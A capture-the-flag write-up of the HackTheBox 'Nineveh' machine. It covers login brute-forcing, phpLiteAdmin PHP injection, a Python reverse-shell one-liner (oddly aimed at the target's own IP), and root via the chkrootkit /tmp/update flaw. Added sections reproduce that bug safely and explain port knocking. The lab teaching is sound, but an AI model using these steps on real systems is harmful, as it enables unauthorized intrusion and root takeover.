HackTheBox — Nineveh

Rayaan Hussain
4 min read, Apr 16, 2021

Reconnaissance

# Nmap 7.80 scan initiated Thu Sep 17 14:33:38 2020 as: nmap -sC -sV -A -oN initial 10.10.10.43
Nmap scan report for 10.10.10.43
Host is up (0.19s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1

The scan reveals two open ports: HTTP on 80 and HTTPS on 443.

Add nineveh.htb to the hosts file.

Using GoBuster, we find a directory called /db.

Heading over to https://nineveh.htb/db/index.php gives us the phpLiteAdmin login form.

phpLiteAdmin is a web portal for managing SQLite databases. Running hydra against this login form gave us admin:password123.

Log in to phpLiteAdmin. There is a database called test at /var/tmp/test, and it has no tables. Run searchsploit on phpliteadmin.

PHPLiteAdmin 1.9.3 — Remote PHP Code Injection

Since we are logged into phpLiteAdmin as admin, we can rename the database so that it has a .php extension.
Put some PHP code in the text fields of a table and then request the file in the browser to execute it.
We need to save the database as ninevehNotes.php, because the server checks for the string "ninevehNotes" in the file name.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.43",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We get a shell as www-data.

Next we write procmon.sh, a small process-monitoring script. Unlike pspy, it does not see everything running on the system, only processes that start while the script is running.

#!/bin/bash
# Split ps output on newlines only, so a command line containing spaces stays one record.
IFS=$'\n'
old_process=$(ps -eo user,command)
while true
do
    new_process=$(ps -eo user,command)
    # Print only the lines that changed since the last snapshot (started or exited processes).
    diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
    sleep 1
    old_process=$new_process
done

We see a script called vulnScan.sh being run. Hopefully by root :)

vulnScan.sh runs chkrootkit:

#!/bin/bash
/usr/bin/chkrootkit > /report/report-`date +%y-%m-%d:%H:%M`.txt
chown amrois:amrois /report/report-`date +%y-%m-%d:%H:%M`.txt

chkrootkit is a tool for checking a system for rootkits. It has a flaw: if a file called update exists in /tmp, chkrootkit executes it when it runs.

We just found a serious vulnerability in the chkrootkit package, which may allow local attackers to gain root access to a box in certain configurations (/tmp not mounted noexec).

The vulnerability is located in the function slapper() in the shellscript chkrootkit:

slapper (){
   SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
   SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
   ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
   SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
   OPT=-an
   STATUS=0
   file_port=

   if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}"> /dev/null 2>&1
   then
      STATUS=1
      [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
         $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
         tr -d :`
   fi
   for i in ${SLAPPER_FILES}; do
      if [ -f ${i} ]; then
         file_port=$file_port $i
         STATUS=1
      fi
   done
   if [ ${STATUS} -eq 1 ] ;then
      echo "Warning: Possible Slapper Worm installed ($file_port)"
   else
      if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
      return ${NOT_INFECTED}
   fi
}

The line 'file_port=$file_port $i' will execute all files specified in $SLAPPER_FILES as the user chkrootkit is running on (usually root), if $file_port is empty, because of missing quotation marks around the variable assignment.

- Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.
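To see exactly why the unquoted line runs a file instead of recording its name, here is a small reproduction of the bug class next to the one-character fix. This is an added example, not code from the writeup or from chkrootkit: it mirrors only the for-loop from slapper(), uses a scratch directory created with mktemp instead of /tmp, and the planted update file is a constructed stand-in that just drops a marker file, so nothing here needs root. The function names (make_scratch, vulnerable_loop, fixed_loop, check_variant) are this example's own.

```shell
#!/bin/sh
# Added example: reproduces the unquoted-assignment bug from chkrootkit's
# slapper() loop in a throwaway directory and shows the quoted fix.

# Create a scratch "tmp" holding a stand-in for /tmp/update. The stand-in is a
# constructed script whose only effect is to create a marker file, so the
# caller can tell whether it was executed. Prints the scratch path.
make_scratch() {
    scratch=$(mktemp -d)
    printf '#!/bin/sh\n: > "%s/marker"\n' "$scratch" > "$scratch/update"
    chmod +x "$scratch/update"
    echo "$scratch"
}

# The loop as chkrootkit shipped it. With file_port empty, the shell reads
# "file_port= /path/update" as a temporary environment assignment followed by
# a command, so the file named by $i is executed rather than appended.
vulnerable_loop() {
    slapper_files="$1/.bugtraq $1/update $1/.cinik"
    file_port=
    for i in $slapper_files; do
        if [ -f "$i" ]; then
            file_port=$file_port $i
        fi
    done
}

# The fixed loop: with the right-hand side quoted, the line is a plain string
# append and nothing is executed. Prints the collected file list.
fixed_loop() {
    slapper_files="$1/.bugtraq $1/update $1/.cinik"
    file_port=
    for i in $slapper_files; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    echo "$file_port"
}

# Run one variant ("vulnerable" or "fixed") against a fresh scratch directory
# and report "executed" or "not-executed" depending on whether the marker appeared.
check_variant() {
    scratch=$(make_scratch)
    if [ "$1" = vulnerable ]; then
        vulnerable_loop "$scratch"
    else
        fixed_loop "$scratch" > /dev/null
    fi
    if [ -f "$scratch/marker" ]; then result=executed; else result=not-executed; fi
    rm -rf "$scratch"
    echo "$result"
}

echo "vulnerable loop: $(check_variant vulnerable)"
echo "fixed loop:      $(check_variant fixed)"
```

The pattern is easy to spot in review: any line of the form `name=$value word` where `word` is meant to be data is a command invocation with a prefixed environment assignment, and a linter such as ShellCheck flags it. The fix chkrootkit shipped is the quoted assignment shown in fixed_loop; mounting /tmp noexec, as the advisory notes, only limits the impact and does not remove the bug.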

Write a reverse shell to /tmp/update and wait for the connection back as root.
chkrootkit is almost always run as root.

We get a reverse shell as root. Voila! We can grab both the user and root flags: a direct privesc to root.

However, the intended route is through the user amrois.

Our nmap scan did not show SSH, but ps -ef | grep sshd showed sshd running on the system. The port was being filtered by iptables rules.

The knockd configuration file (readable only by root) shows that port knocking is in use.

Heading over to https://nineveh.htb/secure_notes, we get an image, nineveh.png.
Run binwalk on this image.

After extracting the embedded archive, we get the public and private SSH keys for the user amrois.

SSH is still filtered, though, because a port-knocking service is running. We need to send TCP SYN packets to the specified ports, in order, to open the SSH port.

Checking the /var/mail directory, we find the knock sequence: 571, 290, 911.

Use nmap to send a SYN packet to each of these ports.

for i in 571 290 911; do nmap -Pn -p $i --host_timeout 201 --max-retries 0 nineveh.htb; done

After successfully knocking, SSH is open. Use the amrois key to SSH into the box and get the user flag.
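For context on what the knock sequence does on the server side, here is an illustrative knockd configuration. It is an added example, not the file from the box (the writeup does not reproduce that file); it assumes sshd on port 22, iptables as the firewall, and the 571, 290, 911 sequence found in /var/mail. The section names openSSH and closeSSH are this example's own.

```ini
[options]
    logfile = /var/log/knockd.log

[openSSH]
    sequence    = 571,290,911
    seq_timeout = 5
    tcpflags    = syn
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

[closeSSH]
    sequence    = 911,290,571
    seq_timeout = 5
    tcpflags    = syn
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
```

knockd watches the interface with libpcap for SYN packets to the listed ports in the given order within seq_timeout seconds, then runs the command with %IP% replaced by the knocking client's address. That is why the nmap loop above sends a single probe per port (--max-retries 0) and gives up on each host quickly: retries or slow probes could land out of order or outside the timeout window. A knock sequence protects a service only from scanners that never learn it; here it was recoverable from a world-readable mailbox, so it should be treated as obscurity on top of key-based authentication, not as the control itself.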

Use the chkrootkit exploit from above to get root access. ;)
